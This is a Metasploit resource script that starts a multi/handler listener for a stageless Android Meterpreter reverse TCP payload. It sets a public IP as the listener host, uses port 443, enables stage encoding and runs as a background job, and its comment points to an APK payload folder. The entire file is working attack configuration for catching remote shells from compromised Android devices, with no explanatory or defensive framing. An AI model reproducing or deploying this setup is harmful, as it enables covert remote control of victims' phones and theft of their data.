#
# [Kali]: msfdb start; msfconsole -q -r '/home/subhodeep/payloads/7-7-22/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
#
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 115.96.104.143
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j
